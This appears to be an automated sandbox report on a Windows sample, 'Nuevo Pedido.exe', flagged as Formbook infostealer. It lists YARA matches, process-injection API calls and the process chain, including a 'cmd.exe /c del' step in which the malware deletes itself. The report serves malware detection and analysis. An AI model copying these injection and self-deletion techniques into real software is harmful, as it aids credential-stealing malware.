Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_00A85C24 0_2_00A85C24
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_02BC8250 0_2_02BC8250
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_02BCD2F8 0_2_02BCD2F8
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_05635AA0 0_2_05635AA0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_05635AB0 0_2_05635AB0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041BC78 3_2_0041BC78
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00408C7B 3_2_00408C7B
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00408C80 3_2_00408C80
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041BD01 3_2_0041BD01
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041BEE0 3_2_0041BEE0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041CFB6 3_2_0041CFB6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00DE5C24 3_2_00DE5C24
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BF900 3_2_019BF900
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D4120 3_2_019D4120
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A820A8 3_2_01A820A8
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CB090 3_2_019CB090
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E20A0 3_2_019E20A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A828EC 3_2_01A828EC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A71002 3_2_01A71002
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EEBB0 3_2_019EEBB0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7DBD2 3_2_01A7DBD2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A82B28 3_2_01A82B28
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A822AE 3_2_01A822AE
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E2581 3_2_019E2581
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A825DD 3_2_01A825DD
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CD5E0 3_2_019CD5E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A82D07 3_2_01A82D07
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B0D20 3_2_019B0D20
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A81D55 3_2_01A81D55
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C841F 3_2_019C841F
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7D466 3_2_01A7D466
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A81FF1 3_2_01A81FF1
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A82EF7 3_2_01A82EF7
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D6E30 3_2_019D6E30
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7D616 3_2_01A7D616
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478841F 16_2_0478841F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483D466 16_2_0483D466
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04770D20 16_2_04770D20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048425DD 16_2_048425DD
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04842D07 16_2_04842D07
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478D5E0 16_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04841D55 16_2_04841D55
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2581 16_2_047A2581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04796E30 16_2_04796E30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04842EF7 16_2_04842EF7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483D616 16_2_0483D616
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04841FF1 16_2_04841FF1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048420A8 16_2_048420A8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048428EC 16_2_048428EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831002 16_2_04831002
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B090 16_2_0478B090
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477F900 16_2_0477F900
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048422AE 16_2_048422AE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483DBD2 16_2_0483DBD2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04842B28 16_2_04842B28
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AEBB0 16_2_047AEBB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061BC78 16_2_0061BC78
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00608C7B 16_2_00608C7B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00608C80 16_2_00608C80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061BD01 16_2_0061BD01
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00602D90 16_2_00602D90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061BEE0 16_2_0061BEE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00602FB0 16_2_00602FB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061CFB6 16_2_0061CFB6
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: String function: 019BB150 appears 35 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0477B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004185E0 NtCreateFile, 3_2_004185E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00418690 NtReadFile, 3_2_00418690
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00418710 NtClose, 3_2_00418710
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004187C0 NtAllocateVirtualMemory, 3_2_004187C0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004185DA NtCreateFile, 3_2_004185DA
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041870C NtReadFile,NtClose, 3_2_0041870C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004187BA NtAllocateVirtualMemory, 3_2_004187BA
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F99A0 NtCreateSection,LdrInitializeThunk, 3_2_019F99A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_019F9910
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_019F98F0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9840 NtDelayExecution,LdrInitializeThunk, 3_2_019F9840
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_019F9860
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_019F9A00
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A20 NtResumeThread,LdrInitializeThunk, 3_2_019F9A20
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A50 NtCreateFile,LdrInitializeThunk, 3_2_019F9A50
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F95D0 NtClose,LdrInitializeThunk, 3_2_019F95D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9540 NtReadFile,LdrInitializeThunk, 3_2_019F9540
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_019F9780
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_019F97A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_019F9FE0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_019F9710
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_019F96E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_019F9660
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F99D0 NtCreateProcessEx, 3_2_019F99D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9950 NtQueueApcThread, 3_2_019F9950
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F98A0 NtWriteVirtualMemory, 3_2_019F98A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9820 NtEnumerateKey, 3_2_019F9820
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FB040 NtSuspendThread, 3_2_019FB040
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FA3B0 NtGetContextThread, 3_2_019FA3B0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9B00 NtSetValueKey, 3_2_019F9B00
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A80 NtOpenDirectoryObject, 3_2_019F9A80
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A10 NtQuerySection, 3_2_019F9A10
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F95F0 NtQueryInformationFile, 3_2_019F95F0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FAD30 NtSetContextThread, 3_2_019FAD30
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9520 NtWaitForSingleObject, 3_2_019F9520
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9560 NtWriteFile, 3_2_019F9560
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FA710 NtOpenProcessToken, 3_2_019FA710
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9730 NtQueryVirtualMemory, 3_2_019F9730
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FA770 NtOpenThread, 3_2_019FA770
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9770 NtSetInformationFile, 3_2_019F9770
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9760 NtOpenProcess, 3_2_019F9760
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F96D0 NtCreateKey, 3_2_019F96D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9610 NtEnumerateValueKey, 3_2_019F9610
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9650 NtQueryValueKey, 3_2_019F9650
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9670 NtQueryInformationProcess, 3_2_019F9670
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9540 NtReadFile,LdrInitializeThunk, 16_2_047B9540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B95D0 NtClose,LdrInitializeThunk, 16_2_047B95D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_047B9660
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9650 NtQueryValueKey,LdrInitializeThunk, 16_2_047B9650
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_047B96E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B96D0 NtCreateKey,LdrInitializeThunk, 16_2_047B96D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9710 NtQueryInformationToken,LdrInitializeThunk, 16_2_047B9710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9FE0 NtCreateMutant,LdrInitializeThunk, 16_2_047B9FE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9780 NtMapViewOfSection,LdrInitializeThunk, 16_2_047B9780
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_047B9860
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9840 NtDelayExecution,LdrInitializeThunk, 16_2_047B9840
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_047B9910
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B99A0 NtCreateSection,LdrInitializeThunk, 16_2_047B99A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A50 NtCreateFile,LdrInitializeThunk, 16_2_047B9A50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9560 NtWriteFile, 16_2_047B9560
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BAD30 NtSetContextThread, 16_2_047BAD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9520 NtWaitForSingleObject, 16_2_047B9520
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B95F0 NtQueryInformationFile, 16_2_047B95F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9670 NtQueryInformationProcess, 16_2_047B9670
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9610 NtEnumerateValueKey, 16_2_047B9610
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9770 NtSetInformationFile, 16_2_047B9770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BA770 NtOpenThread, 16_2_047BA770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9760 NtOpenProcess, 16_2_047B9760
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9730 NtQueryVirtualMemory, 16_2_047B9730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BA710 NtOpenProcessToken, 16_2_047BA710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B97A0 NtUnmapViewOfSection, 16_2_047B97A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BB040 NtSuspendThread, 16_2_047BB040
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9820 NtEnumerateKey, 16_2_047B9820
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B98F0 NtReadVirtualMemory, 16_2_047B98F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B98A0 NtWriteVirtualMemory, 16_2_047B98A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9950 NtQueueApcThread, 16_2_047B9950
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B99D0 NtCreateProcessEx, 16_2_047B99D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A20 NtResumeThread, 16_2_047B9A20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A10 NtQuerySection, 16_2_047B9A10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A00 NtProtectVirtualMemory, 16_2_047B9A00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A80 NtOpenDirectoryObject, 16_2_047B9A80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9B00 NtSetValueKey, 16_2_047B9B00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BA3B0 NtGetContextThread, 16_2_047BA3B0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006185E0 NtCreateFile, 16_2_006185E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00618690 NtReadFile, 16_2_00618690
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00618710 NtClose, 16_2_00618710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006187C0 NtAllocateVirtualMemory, 16_2_006187C0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006185DA NtCreateFile, 16_2_006185DA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061870C NtReadFile,NtClose, 16_2_0061870C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006187BA NtAllocateVirtualMemory, 16_2_006187BA
Sample file is different than original file name gathered from version info
Source: Nuevo Pedido.exe Binary or memory string: OriginalFilename vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.242885207.0000000005EF0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.243408230.0000000006390000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe Binary or memory string: OriginalFilename vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000003.00000002.309549800.0000000001C3F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe Binary or memory string: OriginalFilenameMethodImplAttribut.exe. vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Nuevo Pedido.exe Virustotal: Detection: 32%
Source: Nuevo Pedido.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\Nuevo Pedido.exe File read: C:\Users\user\Desktop\Nuevo Pedido.exe:Zone.Identifier Jump to behavior
Source: Nuevo Pedido.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Nuevo Pedido.exe "C:\Users\user\Desktop\Nuevo Pedido.exe"
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" Jump to behavior
